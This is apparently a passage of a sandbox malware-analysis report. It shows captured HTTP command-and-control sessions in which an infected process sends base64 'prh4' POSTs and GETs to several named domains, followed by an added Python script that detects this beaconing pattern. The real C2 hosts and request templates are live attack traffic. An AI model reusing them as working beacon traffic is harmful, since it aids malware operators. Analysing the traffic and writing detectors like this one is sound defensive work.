                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      31 | 192.168.2.10 | 50007 | 209.74.77.109 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:53.930926085 CET | 1790 | OUT | POST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 4e 50 72 2b 33 62 41 52 6d 78 78 72 58 32 54 69 37 63 55 43 5a 44 39 32 44 62 4b 43 37 56 6c 4c 76 41 68 76 79 2b 38 36 51 44 77 4d 42 32 42 55 57 71 6f 68 6d 74 6d 4e 68 32 64 64 44 77 6c 46 6b 5a 48 32 32 50 49 4d 75 34 69 56 54 71 76 36 65 4c 6d 45 75 50 6f 6f 5a 79 48 42 4a 6d 39 71 6c 54 76 2f 46 76 38 41 37 72 55 64 77 69 6a 59 74 52 33 67 37 2b 67 4e 6e 76 73 38 4c 6a 75 67 5a 55 4d 4c 4a 55 7a 75 5a 72 4e 32 45 45 4c 78 69 76 51 79 37 65 34 7a 6b 6b 4f 79 7a 4f 4a 6c 53 2b 50 66 54 2b 2f 75 73 54 4b 33 68 39 30 79 62 45 66 57 65 53 4c 61 39 59 6a 38 68 4e 4f 6a 61 75 2f 70 57 58 6a 58 2b 48 4c 49 79 47 30 71 4d 52 56 58 6c 36 73 70 6f 2b 41 33 67 4d 39 71 73 50 67 7a 59 69 4f 73 73 43 2f 34 73 36 67 50 6b 31 6d 65 45 58 45 31 65 61 41 6a 41 47 6e 66 2f 56 58 50 41 2f 6e 50 79 6a 4a 6a 35 4d 6d 59 46 31 53 6c 70 7a 74 45 38 49 34 78 56 53 62 38 34 4b 78 [TRUNCATED]
                                                                      Data Ascii: prh4=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 [TRUNCATED]
                                                                      Nov 20, 2024 09:24:54.511640072 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:54 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      32 | 192.168.2.10 | 50008 | 209.74.77.109 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:56.477067947 CET | 495 | OUT | GET /n9b0/?prh4=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4udfcATptjj7os9tTYvN+mNNekq8bw==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:57.083714962 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:56 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
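Across sessions 27 to 32 the same request shape repeats against different hosts and path tokens (`/gxyh/` on www.zxyck.net, `/n9b0/` on www.dailyfuns.info): two or three form-urlencoded POSTs carrying a single `prh4=<base64>` parameter with `Origin`, `Referer` and `Cache-Control: no-cache` set as if a browser had submitted a form, followed by a GET to the same path with the same parameter plus a constant second token `_VK8=7pXD8zQxGFxP`, all sent with a Windows Phone (Lumia 521) User-Agent from a desktop x86 process. The 404s from the second host do not end the sequence; the sample simply moves on to the next host. The following is an added example, not part of the Joe Sandbox report, that turns those observations into detection logic: the three requests are copied from sessions 28, 29 and 32 above (Accept headers omitted), while the indicator names, the 100-character base64 threshold and the two-indicator cut-off are this example's own heuristics rather than a published FormBook signature.

```python
"""Fingerprint the beaconing pattern seen in the HTTP sessions above.

Added example, not part of the Joe Sandbox report. SAMPLE_REQUESTS are
excerpts of the requests in sessions 28, 29 and 32 on this page; the
indicator names and thresholds are this example's own heuristics.
"""
import base64
import binascii
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

UA = ("Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; "
      "WPDesktop; Lumia 521) like Gecko")

SAMPLE_REQUESTS = [
    # session 28: GET to www.zxyck.net
    "GET /gxyh/?prh4=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/"
    "YEeKRSLhAnFUBxmqELIOT++SwIfOluLOgfprtVp+sbk1f1bmq9tA==&_VK8=7pXD8zQxGFxP HTTP/1.1\r\n"
    "Host: www.zxyck.net\r\nConnection: close\r\nUser-Agent: " + UA + "\r\n\r\n",
    # session 29: first POST to www.dailyfuns.info (Content-Length 193)
    "POST /n9b0/ HTTP/1.1\r\nHost: www.dailyfuns.info\r\nOrigin: http://www.dailyfuns.info\r\n"
    "Cache-Control: no-cache\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 193\r\nConnection: close\r\nReferer: http://www.dailyfuns.info/n9b0/\r\n"
    "User-Agent: " + UA + "\r\n\r\n"
    "prh4=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+"
    "644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu6efHt+"
    "b5/TpyCvVMwrJnPxQ0EFav",
    # session 32: GET to www.dailyfuns.info
    "GET /n9b0/?prh4=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0"
    "hIjSjfnpkftd4udfcATptjj7os9tTYvN+mNNekq8bw==&_VK8=7pXD8zQxGFxP HTTP/1.1\r\n"
    "Host: www.dailyfuns.info\r\nConnection: close\r\nUser-Agent: " + UA + "\r\n\r\n",
]

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query string, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}


def split_params(qs: str) -> List[Tuple[str, str]]:
    """Split 'a=b&c=d' by hand: urllib's parse_qsl turns '+' into a space, corrupting base64."""
    return [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in qs.split("&") if p]


def is_base64_blob(value: str, min_len: int = 100) -> bool:
    """True for a long value that is syntactically valid base64 (length, alphabet, padding)."""
    if len(value) < min_len or not BASE64_RE.match(value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except binascii.Error:
        return False
    return True


def beacon_indicators(req: dict) -> List[str]:
    """Names of the C2-style traits a single request exhibits (heuristics, not a signature)."""
    h = req["headers"]
    host = h.get("host", "")
    ua = h.get("user-agent", "")
    hits = []
    if req["method"] == "POST":
        params = split_params(req["body"])
        if (h.get("content-type") == "application/x-www-form-urlencoded"
                and len(params) == 1 and is_base64_blob(params[0][1])):
            hits.append("single-param-base64-post")
        # Browser-style Origin/Referer pointing at the posted path itself, on plain HTTP.
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            hits.append("self-referer-form-post")
    elif req["method"] == "GET":
        params = split_params(req["query"])
        if len(params) == 2 and is_base64_blob(params[0][1]) and 8 <= len(params[1][1]) <= 16:
            hits.append("base64-get-with-token")
    if h.get("cache-control") == "no-cache" and h.get("connection") == "close":
        hits.append("no-cache-close")
    if "WPDesktop" in ua and "Lumia" in ua:
        hits.append("windows-phone-ua")  # phone UA from a desktop x86 process
    return hits


def pivot_hosts(reqs: List[dict]) -> Dict[str, Set[str]]:
    """Map each pivot (parameter name, fixed second GET token) to the hosts that received it.
    A pivot shared across hosts is the rotating host list visible in the sessions above."""
    pivots: Dict[str, Set[str]] = defaultdict(set)
    for r in reqs:
        if len(beacon_indicators(r)) < 2:
            continue
        host = r["headers"].get("host", "")
        params = split_params(r["body"] if r["method"] == "POST" else r["query"])
        if params:
            pivots["param:" + params[0][0]].add(host)
        if r["method"] == "GET" and len(params) == 2:
            pivots["token:" + params[1][1]].add(host)
    return {k: v for k, v in pivots.items() if len(v) > 1}


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for r in parsed:
        print(r["method"], r["headers"]["host"], r["path"], beacon_indicators(r))
    print(pivot_hosts(parsed))
```

Run against the three captured requests, every one scores at least two indicators and both pivots (`param:prh4` and `token:7pXD8zQxGFxP`) link www.zxyck.net and www.dailyfuns.info to the same client, which is the kind of correlation a single-host signature misses. Because the base64 payload is opaque, nothing here depends on decrypting it; on a real proxy log the same checks apply per request, and the host pivot is what separates one infected machine cycling through its host list from unrelated form submissions.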


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      33 | 192.168.2.10 | 50009 | 188.114.96.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:02.137579918 CET | 762 | OUT | POST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 42 4f 42 41 4e 70 56 62 51 4e 6d 32 67 33 54 59 38 4f 37 62 73 6f 70 79 6a 52 48 41 41 4e 65 62 54 35 33 70 58 39 77 46 76 76 31 51 53 77 56 31 6d 46 31 6b 67 37 66 46 53 47 76 6e 6d 31 47 51 46 4c 43 78 4e 62 31 71 47 34 37 59 41 44 42 38 49 54 44 49 38 71 69 4c 38 4b 36 68 34 65 59 2f 2b 68 66 72 39 6d 2b 30 45 51 51 79 64 65 77 4b 32 36 43 6f 6f 6f 63 53 75 67 33 55 7a 37 4d 79 67 4b 49 76 5a 6a 49 41 65 4b 32 63 4d 31 6c 72 68 47 76 57 42 34 6c 74 31 33 35 76 67 50 7a 2b 35 37 39 46 5a 6b 70 33 4e 56 67 73 77 55 54 52
                                                                      Data Ascii: prh4=1XpfOM1gsz3GBOBANpVbQNm2g3TY8O7bsopyjRHAANebT53pX9wFvv1QSwV1mF1kg7fFSGvnm1GQFLCxNb1qG47YADB8ITDI8qiL8K6h4eY/+hfr9m+0EQQydewK26CooocSug3Uz7MygKIvZjIAeK2cM1lrhGvWB4lt135vgPz+579FZkp3NVgswUTR
                                                                      Nov 20, 2024 09:25:02.842266083 CET | 1049 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:02 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:02 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20QctgtnUAu12sMW441BhxUscYiFWId6jrw%2F66N3kmYCsDXASlFClJyBMlF7pf0I%2FTj3Bn%2FK%2FnoDT6QXP%2B8siTxSUIfJF4n5gLj9rzFjKD%2FHzzT9RbzkXaPP6bTu8JoBh8eZ9raDSg8%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c0ec82e42bd-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      34 | 192.168.2.10 | 50010 | 188.114.96.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:04.685705900 CET | 786 | OUT | POST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 36 62 55 59 48 70 57 2b 6f 46 73 76 31 51 47 41 56 77 69 46 31 56 67 37 62 6e 53 48 54 6e 6d 78 57 51 46 4f 2b 78 4e 73 70 74 55 34 37 61 4c 6a 42 69 58 44 44 49 38 71 69 4c 38 4b 2b 4c 34 65 41 2f 2b 52 50 72 38 48 2b 37 4e 77 51 78 55 2b 77 4b 67 4b 44 76 6f 6f 64 46 75 68 62 74 7a 34 30 79 67 49 67 76 63 6e 55 48 51 4b 32 65 43 56 6c 2f 6d 32 53 64 44 37 5a 70 77 6e 30 67 38 2b 76 63 33 36 41 43 49 31 49 67 65 69 38 69 2b 53 6d 37 41 63 50 76 38 4e 37 66 58 38 4d 68 48 39 2f 37 50 53 71 67 37 41 3d 3d
                                                                      Data Ascii: prh4=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/6bUYHpW+oFsv1QGAVwiF1Vg7bnSHTnmxWQFO+xNsptU47aLjBiXDDI8qiL8K+L4eA/+RPr8H+7NwQxU+wKgKDvoodFuhbtz40ygIgvcnUHQK2eCVl/m2SdD7Zpwn0g8+vc36ACI1Igei8i+Sm7AcPv8N7fX8MhH9/7PSqg7A==
                                                                      Nov 20, 2024 09:25:05.414819002 CET | 1043 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:05 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:05 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEryPHZFxfvqARwhFeSZQfE%2Bc5NVrs7g2mM%2FkI7FTYHvfnY0KYQI31TV4aszXfbQ4WPOWoJWlu0pn56tLwUyOsw6z9kV%2Bj60sC5jhyBpsqHoJaIblw0smN2Il9D7ESn5u01t3Ot6Hak%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c1ebf881a03-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      35 | 192.168.2.10 | 50011 | 188.114.96.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:07.229406118 CET | 1799 | OUT | POST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 79 62 55 76 76 70 58 66 6f 46 74 76 31 51 61 51 56 78 69 46 31 79 67 37 6a 6a 53 48 66 52 6d 33 4b 51 45 73 6d 78 4c 64 70 74 65 34 37 61 45 44 42 6a 49 54 44 5a 38 71 79 50 38 4b 4f 4c 34 65 41 2f 2b 54 48 72 31 32 2b 37 42 51 51 79 64 65 77 47 32 36 43 49 6f 6f 30 77 75 68 66 69 7a 6f 55 79 75 49 51 76 65 79 49 48 63 4b 32 59 46 56 6b 34 6d 32 65 53 44 37 31 66 77 6d 78 33 38 35 72 63 30 64 35 4b 4e 55 4d 59 42 55 34 4c 6e 67 43 52 47 37 7a 4a 6c 64 47 73 57 38 4e 38 61 50 79 65 4f 52 7a 38 6a 56 47 72 57 2f 73 61 6d 33 54 76 61 78 48 63 7a 51 33 33 6c 79 49 48 77 72 38 79 57 2b 76 32 55 42 6c 75 55 33 4b 7a 79 4a 63 36 48 42 45 4b 34 6c 2b 6a 5a 68 61 67 35 44 51 68 57 53 4e 57 67 6b 43 43 6b 55 47 62 65 42 68 52 30 77 49 36 34 65 43 75 6b 77 49 38 5a 39 75 67 48 69 33 35 44 49 75 66 42 70 76 59 48 4e 56 31 6e 7a 69 48 74 31 66 4a 66 76 37 56 5a 6c 50 62 4e [TRUNCATED]
                                                                      Data Ascii: prh4= [TRUNCATED]
                                                                      Nov 20, 2024 09:25:07.927017927 CET | 1037 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:07 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:07 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9r5o9D6kHiNolSFOI8NMqmiLcZAVT8i1n5j3VEBjxvcB9aCGr6gLJLwKizHcMYvwW2vEv68nKJERP1VCYJdvWudnKmWR0FSbsqmQhDnQO3rxzb07wmZ%2F422und0avyehxa%2Ff1fa0Q38%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c2e9c9a42d1-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
